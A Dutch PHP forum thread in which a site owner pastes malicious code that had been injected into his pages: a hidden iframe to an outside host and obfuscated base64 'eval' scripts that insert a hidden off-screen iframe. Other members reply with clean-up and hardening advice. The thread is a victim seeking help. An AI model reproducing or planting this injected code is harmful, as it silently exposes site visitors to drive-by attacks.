Hackers?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Dynamics Ontwikkelaar

Dit ga je doen Ontwikkelen van Dynamics 365 voor de interne uitrol; Samen met de consultants sparren met klanten over de wensen en eisen; Ontwikkelen van Dynamics 365 voor verschillende grote klanten; Technische analyse en testen; Meedenken over het gebruik en de richting van Dynamics binnen de organisatie. Hier ga je werken Onze opdrachtgever, gevestigd in regio Eindhoven, levert een compleet dienstenpakket op het gebied van IT. Zij pakken verschillende (complexe) vraagstukken van grote organisaties op. De sfeer intern is gezellig en informeel. Men houdt van hard werken maar gezelligheid door middel van een borrel of gezamenlijke lunch komt er

Bekijk vacature »

Software Ontwikkelaar

Java/Kotlin Developer Ben jij een ervaren Java/Kotlin developer met een passie voor het automatiseren van bedrijfsprocessen? Wil je graag deelnemen aan uitdagende projecten bij aansprekende klanten? En ben je op zoek naar een professioneel, ambitieus en dynamisch bedrijf om je carrière verder te ontwikkelen? Kom dan ons team bij Ritense in Amsterdam versterken! Zo ziet de functie eruit: Als Java/Kotlin developer bij Ritense ben je verantwoordelijk voor de ontwikkeling en implementatie van applicaties die bedrijfsprocessen automatiseren, zodat onze klanten slimmer, efficiënter en klantgerichter kunnen werken. Als developer ben je in de lead en zorg je voor de correcte oplevering van

Bekijk vacature »

Klein team zoekt grote fullstack .NET developer to

Bedrijfsomschrijving Deze werkgever is marktleider in de Benelux en is Europees ook al aardig aan de weg aan het timmeren. Ze voorzien technische winkels van apparatuur om producten een langer leven te geven. Hiermee reduceren ze flink wat CO2 uitstoot en dat is natuurlijk goed voor iedereen! IT speelt een belangrijke rol in de bedrijfsvoering en de applicaties zijn van goed niveau. Als fullstack .NET developer ga jij je bijdrage leveren aan het verder verbeteren van de applicaties en de interne processen. Ze zijn nu met ruim 50 medewerkers in totaal en de afdeling development bestaat uit een 5tal developers.

Bekijk vacature »

Front-end Developer

Do you want to work with the latest technologies on the development of new systems and applications? Create elegant interfaces using VueJS for thousands of users? Get moving and strengthen Nederlandse Loterij as a Front-end Developer. Thanks to your efforts, our services are always presented in style. As a Front-end Developer you are responsible for website development and improving customer experience based on data analyze. In this way, you directly contribute to a happy, healthy and sporty Netherlands. As a Front-end Developer you score by: Writing elegant, testable components without side-effects to provide functionality to the users Website development, adding

Bekijk vacature »

Lead developer

Functie Als lead developer wordt jij verantwoordelijk voor een van onze development teams. Samen met de Software Architect bewaak jij de kwaliteit en uitvoering van onze complexe vraagstukken. Daarnaast ben jij verantwoordelijk voor het inschatten, designen en ontwikkelen van middelgrote tot grote veranderingen in de software. Ook coördineer jij het proces rondom complexe technische vraagstukken. Verder bestaat jouw takenpakket uit het volgende: – Het aansturen van jouw development team; – Het begeleiden van Junior Software Engineers; – Het maken van technische analyses m.b.t. nieuwe aanvragen en het tijdsbestek inschatten voor de uitvoering hiervan; – Het uitvoeren van de ontwikkeling van

Bekijk vacature »

Medior/Senior Python developer (Django)

Functie Je komt te werken in het IT-team bestaande uit de Lead developer en 4 (medior/senior) developers. Gezamenlijk werken jullie aan de verbetering en uitbreiding van de software. Binnen het development team is er veel vrijheid en zelfstandigheid, zonder dat ze hiermee afdoen aan de kwaliteit. Zo hebben ze elke ochtend een korte stand-up (10:00 uur) en werken ze met pair-programming sessies. Ook is er een hele professionele ontwikkelcyclus waarbij code altijd eerst door een collega wordt getest voordat het naar deployement gaat. Er is een kwaliteitsfocus en dan biedt ruimte om verbeteringen echt door te voeren binnen de gehele

Bekijk vacature »

Front end developer Zorgplatform

Functie Jij als Front end ontwikkelen zult komen te werken samen met 1 PHP ontwikkelaar, 1 Python developer en een flexibele schil aan ontwikkelaars . Samen ga je ervoor zorgen dat de huidige producten doorontwikkeld worden. De Marketplace is geschreven in PHP Laravel en in de front end React. De roostersoftware is ontwikkeld in Python in combinatie met React in de front end. Jij zult als Front ender dus voornamelijk bezig zijn met het verbeteren van onze interfaces op onze verschillende producten. Momenteel ligt de uitdaging in het feit dat de roostersoftware breder schaalbaar moet worden zodat het voor meerdere

Bekijk vacature »

C# developer

Functie Als C# ontwikkelaar ben jij de spin in het web bij deze organisatie. Jij begeleidt en traint de field engineers die bij de klanten machines leveren en installeren. Daarnaast ondersteun jij de field engineers als zij bij de klant vastlopen bij het installeren van de machine m.b.t. software matige vragen. Jouw doel is dan ook om de technische kennis van de field engineers door middel van training zoveel mogelijk uit te breiden. Dit om ervoor te zorgen dat zij zelfstandiger software matige problemen kunnen oplossen. Ook ben jij verantwoordelijk voor het bedenken van software oplossingen voor klanten en dit

Bekijk vacature »

Backend Developer PHP Laravel SaaS

Dit ga je doen Het ontwikkelen van nieuwe features die bijdragen aan de groei van de klanten van de organisatie; Je denkt mee over nieuwe innovaties, features en verbeteringen in de applicatiearchitectuur; Je draagt bij aan de continue ontwikkeling van jouw team doordat je elke dag streeft naar het verbeteren van jouw eigen prestaties; Je neemt actief deel aan Scrum meetings en de Backend Guild. Hier ga je werken Voor een snel groeiend bedrijf, in de regio Nieuw Vennep, zijn wij opzoek naar een ervaren Backend Developer. De organisatie is actief in de e-commercebranche en ontzorgt haar klanten middels een

Bekijk vacature »

PHP Developer

Als PHP Developer bij Coolblue zorg je ervoor dat onze webshops elke dag een beetje beter zijn. Wat doe je als PHP Developer bij Coolblue? Als PHP Developer werk je met andere development teams samen om onze webshop zo optimaal mogelijk te laten werken en onze klanten blij te maken. Hoewel je een PHP Developer bent, sta je open om C# of Typescript in te zetten of te leren. Ook PHP Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om te doen pure PHP code schrijven. Samenwerken met de klantreiziger om onze klanten

Bekijk vacature »

C# .NET Developer

Functie omschrijving Wij zijn op zoek naar een C# .NET Developer voor een bedrijf in de omgeving van Utrecht! Wil jij werken voor een internationaal bedrijf waar je legio mogelijkheden krijgt als Software Ontwikkelaar? Grijp nu je kans! Je kunt een uitdagende rol gaan vervullen als C#.NET Developer binnen een internationaal bedrijf dat gevestigd is in omgeving van Utrecht. Je zult gaan samenwerken met collega's die over de hele wereld verspreid zitten. Dit bedrijf is zeer vooruitstrevend en werkt met de nieuwste technieken. Als C#.NET Developer ga jij je bezig houden met het volgende: Je blijft op de hoogte van

Bekijk vacature »

Oracle Developer / PL SQL

Dit ga je doen Software ontwikkeling aan een internationaal gebruikt pakket; Werken met technieken als Oracle 19c, Toad, PL/SQL, Oracle Forms, Reports en Designer; Meedraaien in internationale projecten; Meedenken over technisch en functioneel ontwerp; Samenwerken met collega's als Informatie Analisten, Testers en Release Managers; Soms wensen en eisen afstemmen met de business. Hier ga je werken Onze klant, een internationaal bekend bedrijf dat essentiële producten maakt waar iedereen graag gebruik van maakt, zoekt versterking in het Software Development team. Samen met 3 developers, een release manager, een informatie analist en 3 testers werk jij aan een systeem waarmee complexe producten

Bekijk vacature »

Front-End Developer

As a Front-End Developer at Coolblue you improve the user-friendliness of our webshop for millions of customers. How do I become a Front-End Developer at Coolblue? As a Front-End Developer you work on the user-friendliness of our webshop for millions of customers. You enjoy working with the UX Designer to pick up stories. You get energy from coming up with creative solutions and are happy to present these within the team. You also take pride in your work and welcome any feedback. Would you like to become a Front-End Developer at Coolblue? Read below if the job suits you. You

Bekijk vacature »

PHP Developer

Dit ga je doen Ontwikkelen, implementeren en testen van PHP-oplossingen en Apps voor klanten en bedrijfsprocessen; Opstellen van requirements en uitwerken van de oplossingen; Testen van software en borgen van een soepele overdracht, inclusief documentatie; Proactief adviseren vanuit eigen expertisegebied over ontwikkelingen en verbeterpunten in technische toepassingen en processen binnen de organisatie. Hier ga je werken De organisatie is een ambitieuze en vooruitstrevende speler in de markt in de regio Rotterdam. Ze zijn de snelst groeiende in hun branche. Met een excellent aanbod en service willen zij de beste keuze zijn voor hun bestaande en nieuwe klanten. Dit alles doen

Bekijk vacature »

PHP Developer

As a PHP Developer at Coolblue, you ensure that our webshops work as optimal as possible. How do I become a PHP Developer at Coolblue? As a PHP Developer you work together with other development teams to make our webshop work as optimal as possible and to make our customers happy. Although you are a PHP Developer, you are not averse to a little TypeScript or other technologies that might be used. Would you also like to become a PHP Developer at Coolblue? Read below if the job suits you. You enjoy doing this Writing vanilla PHP code. Working with

Bekijk vacature »
Olivier Peeters

Olivier Peeters

04/11/2012 13:43:11
Quote Anchor link
Hallo allen,

ik heb een probleem! Blijkbaar is er, op onverklaarbare wijze, op al mijn pagina's deze code toegevoegd =>
"<iframe style="visibility: hidden; display: none; display: none;" src="http://djerseen.com/referer.php?id={A8D99C2D-8615-4C21-AB70-EE2DF83F6905}"></iframe>"


"<script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}returnt;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|
(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDM
/* Ik heb hier een heel deel weggeknipt, want dit gaat nog paginalang door ;-) Tot de laatste regel */
</script>"

Deze code blijkt dus malware te zijn, welke op onverklaarbaze wijze op mijn website gepost is..

Belangrijk is dat ik dit heb op mijn eigen website (gehost op 3owl), en dat ik deze enkel gemaakt heb dmv PHP-pagina's (dus geen CMS) & Filezilla (overzetten op server). Verder zit er voor het gastenboek een 1 MySQL database op mijn pagina. Deze code is ingesloten in mijn pagina's die zichtbaar zijn in het scherm (dus ge-include pagina's hebben deze code niet)...

Door deze code is mijn site gelocaliseerd als aanvalssite, waardoor deze onbereikbaar is. Link van mijn website is -> http://oli4tje.3owl.com/

Hoe komt het dat ik een hacker heb, wat valt hieraan te doen & hoe in de toekomst vermijden?
Vooral, als alles opgelost is (heb nu wel al alle code verwijderd), hoe zorg ik ervoor dat de melding van aanvalsite terug verwijderd word (& dus terug op een normale manier bezocht kan worden?

Alvast bedankt voor jullie raad/hulp. Want ik snap niet hoe dit kan...

Vriendelijke groeten
 
PHP hulp

PHP hulp

23/04/2024 10:37:16
 
Frank Nietbelangrijk

Frank Nietbelangrijk

04/11/2012 14:11:35
Quote Anchor link
Om de site weer open te stellen lijkt het me handig dat je contact opneemt met je provider. Ik zie dat het een gratis host is? Dus ja daar kunnen we niet al te veel van verwachten. Wat bedoel je precies met ... aan mijn pagina's toegevoegd? Welke bestanden dat willen we weten: PHP HTML? of stond de code in je database?
In ieder geval geldt nu dat je al je wachtwoorden moet veranderen en dat je heel kritisch moet gaan kijken naar alle input van buiten af: dus alle <FORM>'s. de waarden worden - waarschijnlijk met PHP- uitgelezen. Die waarden moet je controleren op alles dat maar mogelijk is en escapen zie
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php
$string
=  mysql_real_escape_string ($string); ?>


Heb je ook een file upload in één of meerdere formulieren? zorg dan dat er nooit geen extensies als PHP e.d. geupload kunnen worden. Je moet dit controleren niet aan de hand van een blacklist maar aan de hand van een whitelist, dus alleen extensies doorlaten die jij goedkeurt
 
Reshad F

Reshad F

04/11/2012 14:12:21
Quote Anchor link
ik denk een FTP lek, wachtwoorden veranderen en bij google developer tools een aanvraag doen voor een rescan of hoe het ook heet.. ( ben het ff kwijt ) maar het is niet te missen als je op de pagina bent. ( binnen ongeveer 2 uur meestal ) zou het probleem opgelost moeten zijn. en anders moet je wachten kan een paar uur duren of een week.. maar als google merkt dat het gevaar weg is dan wordt de melding weggehaald :)
 
Ceasar Feijen

Ceasar Feijen

04/11/2012 14:46:41
Quote Anchor link
Misschien ook je gastenboek even checken. Je kunt nu gewoon op submit drukken en voila
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.